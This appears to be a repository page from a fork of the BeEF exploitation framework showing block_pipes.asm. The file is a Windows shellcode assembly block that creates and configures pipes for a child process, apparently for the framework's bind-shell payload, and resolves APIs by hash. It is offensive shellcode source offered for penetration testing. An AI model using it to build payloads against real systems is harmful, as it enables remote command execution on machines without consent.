Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
92e5a50f9b7288f885aaa4288eb41c02a29fb010
beef/modules/exploits/beefbind/shellcode_sources/windows/src/block_pipes.asm
bmantra d7116b8f08 add IPE with ActiveFax 5.01
2013-11-29 19:18:37 +01:00

65 lines
2.7 KiB
NASM
Raw Blame History

;-----------------------------------------------------------------------------;
; Author: Ty Miller @ Threat Intelligence
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (2nd December 2011)
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP is api_call
; Output:
; esp+00 child stdin read file descriptor (inherited)
; esp+04 child stdin write file descriptor (not inherited)
; esp+08 child stdout read file descriptor (not inherited)
; esp+12 child stdout write file descriptor (inherited)
; esp+16 lpPipeAttributes structure (not used after block - 12 bytes)
; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
push 1 ; create lpPipeAtrributes structure on stack so pipe handles are inherited
push 0
push 0x0C
create_pipe_stdout:
push 0 ; allocate space on stack for child stdout file descriptor
mov ebx, esp ; save location of where the child stdout Write file descriptor will be
push 0 ; allocate space on stack for child stdout file descriptor
mov ecx, esp ; save location of where the child stdout Read file descriptor will be
push 0 ; nSize
lea edi,[esp+12] ; lpPipeAttributes - inherited
push edi
push ebx ; stdout write file descriptor
push ecx ; stdout read file descriptor
push 0x0EAFCF3E ; hash ( "kernel.dll", "CreatePipe" )
call ebp ; CreatePipe( Read, Write, 0, 0 )
create_pipe_stdin:
push 0 ; allocate space on stack for child stdout file descriptor
mov ebx, esp ; save location of where the child stdout Write file descriptor will be
push 0 ; allocate space on stack for child stdout file descriptor
mov ecx, esp ; save location of where the child stdout Read file descriptor will be
push 0 ; nSize
lea edi,[esp+20] ; lpPipeAttributes - inherited
push edi
push ebx ; stdout write file descriptor
push ecx ; stdout read file descriptor
push 0x0EAFCF3E ; hash ( "kernel.dll", "CreatePipe" )
call ebp ; CreatePipe( Read, Write, 0, 0 )
no_inherit_read_handle: ; ensure read and write handles to child proc pipes for are not inherited
mov ebx,[esp+8]
push 0
push 1
push ebx ; hChildStdoutRd is the address we set in the CreatePipe call
push 0x1CD313CA ; hash(kernel32.dll, SetHandleInformation)
call ebp ; SetHandleInformation
no_inherit_write_handle:
mov ebx,[esp+4]
push 0
push 1
push ebx ; hChildStdinRw is the address we set in the CreatePipe call
push 0x1CD313CA ; hash(kernel32.dll, SetHandleInformation)
call ebp ; SetHandleInformation
Reference in New Issue View Git Blame Copy Permalink